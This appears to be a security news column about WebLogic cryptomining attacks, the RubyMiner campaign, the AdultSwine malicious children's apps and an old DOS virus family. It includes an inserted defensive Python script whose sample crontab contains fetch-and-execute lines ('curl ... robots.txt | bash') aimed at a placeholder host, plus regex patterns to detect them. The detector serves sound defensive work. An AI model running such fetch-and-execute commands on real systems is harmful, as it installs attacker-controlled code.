Oracle's popular products have fallen victim to a recently published exploit that allows remote execution of arbitrary code. To the experts' surprise, however, nothing worse than unauthorized cryptocurrency mining has happened to them. The attackers exploited a vulnerability in WebLogic application servers that Oracle patched last October.
Using the exploit, which was publicly described a little more than a month ago, requires no special skills, so it is not surprising that the malicious campaign quickly gained momentum. Not only WebLogic servers themselves but also other Oracle solutions built on them were hit. These include PeopleSoft, an ERP system for managing the complex administrative infrastructure and financial flows of a large enterprise (organizations often keep all their data in this system, confidential and not so confidential).
It would seem that no one could come up with more appetizing targets: companies large enough to use expensive Oracle products, and careless enough not to install updates available since autumn. Steal insider secrets, blackmail, and wait for the phone to ring! At the very least, a data leak scandal could be expected. But no, the criminals decided that they were not in the mood for selling information on the black market today, and had a headache besides, and that mining cryptocurrency at current prices is far more profitable anyway.
Either way, the attackers have so far managed to mine at least 611 Monero tokens, approximately $226 thousand: that is how much is stored in the wallet the researchers traced after analyzing an XMRig configuration file that came into their hands. How many such wallets there are is, as usual, unknown.
Attack of retro lovers
As we often have to remind you, many malicious programs use exploits for vulnerabilities that have already been closed. The calculation is obvious: not everyone will know about the updates, and not everyone will install them immediately, which means the attackers will have time to profit if they act quickly.
But the criminals behind the new RubyMiner are in no hurry. They deliberately search for systems that have not been updated for several years, both Windows and Linux, and use an arsenal of old, well-known and long-patched vulnerabilities to mine Monero with the so-called RubyMiner.
After analyzing the Linux server variant of the malware, the researchers reported that it deletes all existing cron jobs and installs its own, which once an hour downloads from the Internet a script hidden inside robots.txt files on various domains. That script, in turn, downloads the good old XMRig.
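As an added example (not code from the original post or from the researchers), here is a small defender-side check for the cron persistence pattern just described: it parses a crontab and flags jobs that fetch a robots.txt and pipe it straight into a shell. The crontab below, its domain and its entries are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab modelled on the described persistence pattern:
# an hourly job that fetches a "robots.txt" and feeds it directly to a shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
0 * * * * curl -s http://example.invalid/robots.txt | bash -s
*/30 * * * * wget -q -O - http://example.invalid/robots.txt | sh
15 4 * * 0 /usr/local/bin/backup.sh
"""

FETCH_RE = re.compile(r"\b(curl|wget)\b")          # a downloader is invoked
ROBOTS_RE = re.compile(r"robots\.txt")              # the "hidden script" carrier
PIPE_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")       # output piped into sh/bash

@dataclass
class CronEntry:
    schedule: str
    command: str

def parse_crontab(text):
    """Return CronEntry objects, skipping comments, blanks and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                    # @hourly, @reboot, ... shortcuts
            parts = line.split(None, 1)
            if len(parts) == 2:
                entries.append(CronEntry(parts[0], parts[1]))
            continue
        parts = line.split(None, 5)                 # five time fields + command
        if len(parts) < 6:
            continue
        entries.append(CronEntry(" ".join(parts[:5]), parts[5]))
    return entries

def is_suspicious(entry):
    """Flag a job that downloads a robots.txt and pipes it into a shell."""
    cmd = entry.command
    return bool(FETCH_RE.search(cmd) and ROBOTS_RE.search(cmd)
                and PIPE_SHELL_RE.search(cmd))

def find_suspicious(text):
    return [e for e in parse_crontab(text) if is_suspicious(e)]

if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_CRONTAB):
        print(f"suspicious cron job [{e.schedule}]: {e.command}")
```

On a real host the same functions can be run over the output of `crontab -l` for each user and over the files under /etc/cron.d; a crontab that suddenly contains nothing but such a job is itself a sign that the original schedule was wiped.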
Of course, most machines over ten years old cannot compete with modern ones on performance, so they do not mine especially well, but hardly anyone pays attention to them, which means unauthorized prospectors are likely to remain undetected longer. As the study of one wallet has shown, the hackers have already earned at least $540. That seems little, but there are practically no costs: the domain from which the malicious script is downloaded was already used in at least one attack in 2013, with the same exploit through which RubyMiner spreads. Apparently, the attackers literally scraped the bottom of the barrel and cobbled the attack together from whatever was lying around.
Fighting swinishness
In December, more than 60 malicious applications, mostly games, that had slipped through numerous checks were removed from the Google Play store. The developers were banned, and users who had downloaded the apps are still being shown warnings of potential danger. The malicious applications used the usual set of tactics: they threw a full-screen warning about a virus, then offered to download an "antivirus" (fake, of course), invited users to take part in lotteries, subscribed them to paid services, and so on. In general, the usual gentleman's set. The case as a whole would be quite ordinary, if not for one "but."
Specifically, this pack of garbage stood out because, firstly, many of the programs were clearly designed for preschoolers: cartoon names, puppies and other attributes of a tender age. And secondly, the applications sometimes began to show children hardcore porn, on top of all other screens and without warning.
And here the question arises not even about moral standards (everything is clear there) but about the adequacy of the intruders. The point is that the choice of method for extracting money or information from a user was made after the malware was downloaded. The applications had a built-in malicious component that researchers called AdultSwine. The "pig" registered on the developers' server, sent data about the user, and waited for instructions on exactly how to tempt or intimidate the new victim.
The decision to show 18+ content to four-year-olds shows an obvious misunderstanding of the target audience by the attackers: the kids are unlikely to click on a porn banner; they are more likely to be frightened and call an adult. Although it may just be a banal error in the profiling algorithms.
Be that as it may, Google representatives stressed that, starting from the end of January, new protective functions will be introduced on Google Play that will warn of suspicious applications. Users themselves, however, should not let their guard down.
Antiquities
Family "Invader" and "Plastique"
Very dangerous resident viruses. They infect .COM and .EXE files (except COMMAND.COM) using the algorithm of the Jerusalem virus, as well as the boot sectors of floppy disks and the hard drive. On floppy disks they format an additional track; when infecting a hard drive, they write themselves immediately after the MBR. Depending on their counters, they can perform a single cycle at each timer interrupt (int 8), erase information on disks, play a melody, and decrypt and display texts:
"Invader" - "by Invader, Feng Chia U., Warning: Don't run ACAD.EXE!";
"Plastique" - "PLASTIQUE 5.21 (plastic bomb) Copyright © 1988-1990 by ABT Group (in association with Hammer LAB.) WARNING: DON'T RUN ACAD.EXE!";
They also contain the text: "ACAD.EXECOMMAND.COM.COM.EXE".
They intercept int 8, 9, 13h, 21h.
Disclaimer: This column reflects only the personal opinion of its author. It may or may not coincide with the position of Kaspersky Lab. It depends on your luck.